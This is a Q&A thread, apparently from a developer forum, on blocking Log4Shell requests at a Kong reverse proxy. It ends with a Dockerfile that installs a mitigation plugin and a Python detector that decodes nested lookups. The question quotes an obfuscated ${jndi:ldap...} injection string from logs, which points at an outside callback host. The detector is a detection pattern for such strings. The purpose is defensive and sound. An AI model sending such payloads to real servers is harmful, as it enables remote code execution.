1

I am using a Kong reverse proxy to proxy every HTTP request for my web servers. I would like to mitigate the current log4j problem ("log4shell") by finding and replacing the critical attackers' strings like "jndi". For example, I found this in my logs:

${jndi:${lower:l}${lower:d}a${lower:p}://xxx.log4j.bin${upper:a}xxx.xx:80/callback}

I think this could be accomplished by using the request transformer plugin. Has anyone already done this?

P.S. Just replacing jndi with disabled is too far-reaching and breaks a lot of things.

dsteinkopf

1 Answer

2

The guys from Kong themselves recently sent a blog post that answers my question. They developed a Kong plugin that mitigates the exploit.

I added this plugin to my Kong by changing my Dockerfile:

FROM kong:2.6
...
USER root
...
# log4shell mitigation
# see https://konghq.com/blog/log4j-log4shell/
RUN git clone https://github.com/brentos/kong-plugin-log4shell && \
    cd kong-plugin-log4shell && \
    luarocks make
...
ENV KONG_PLUGINS ...,log4shell
...
USER kong

Then I just added this log4shell as a global plugin.

dsteinkopf
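For checking proxy logs for strings like the one quoted in the question, the following is an added example, not part of the original post and not the logic of the Kong plugin. It resolves nested lookups from the inside out before matching, so only a real `${jndi:` lookup is flagged and the bare word "jndi" is not; beyond the `lower`/`upper` forms in the question it also handles URL-encoding and Log4j's `name:-default` syntax. All function and variable names are hypothetical.

```python
import re
from urllib.parse import unquote

INNERMOST = re.compile(r"\$\{([^${}]*)\}")   # a ${...} with no lookup nested inside
JNDI = re.compile(r"\$\{jndi:", re.IGNORECASE)  # Log4j lowercases the lookup prefix
MARK = "\ue000"                               # stands in for "$" of lookups we keep


def _resolve(match):
    """Replace one innermost lookup with the text Log4j would substitute."""
    body = match.group(1)
    name, sep, arg = body.partition(":")
    name = name.lower()
    if sep and name == "lower":
        return arg.lower()
    if sep and name == "upper":
        return arg.upper()
    if name != "jndi" and ":-" in body:       # name:-default -> assume the default
        return body.split(":-", 1)[1]
    return MARK + "{" + body + "}"            # jndi, env, sys, ...: keep verbatim


def deobfuscate(text, max_rounds=20):
    """URL-decode, then resolve nested lookups from the inside out."""
    text = unquote(text).replace(MARK, "")
    for _ in range(max_rounds):
        resolved = INNERMOST.sub(_resolve, text)
        if resolved == text:
            break
        text = resolved
    return text.replace(MARK, "$")


def is_jndi_lookup(text):
    """True only for an actual ${jndi: lookup, not for the bare word 'jndi'."""
    return bool(JNDI.search(deobfuscate(text)))


# The string from the question, and a constructed benign request line.
LOGGED = ("${jndi:${lower:l}${lower:d}a${lower:p}://xxx.log4j.bin"
          "${upper:a}xxx.xx:80/callback}")
BENIGN = "GET /docs/jndi-naming-tutorial.html HTTP/1.1"

if __name__ == "__main__":
    for line in (LOGGED, BENIGN):
        print(is_jndi_lookup(line), deobfuscate(line))
```

Lookups that depend on the server's environment (`env`, `sys` and similar) cannot be resolved from a log line, so a hit here is a reason to inspect the request, and a miss is not proof that a line is harmless.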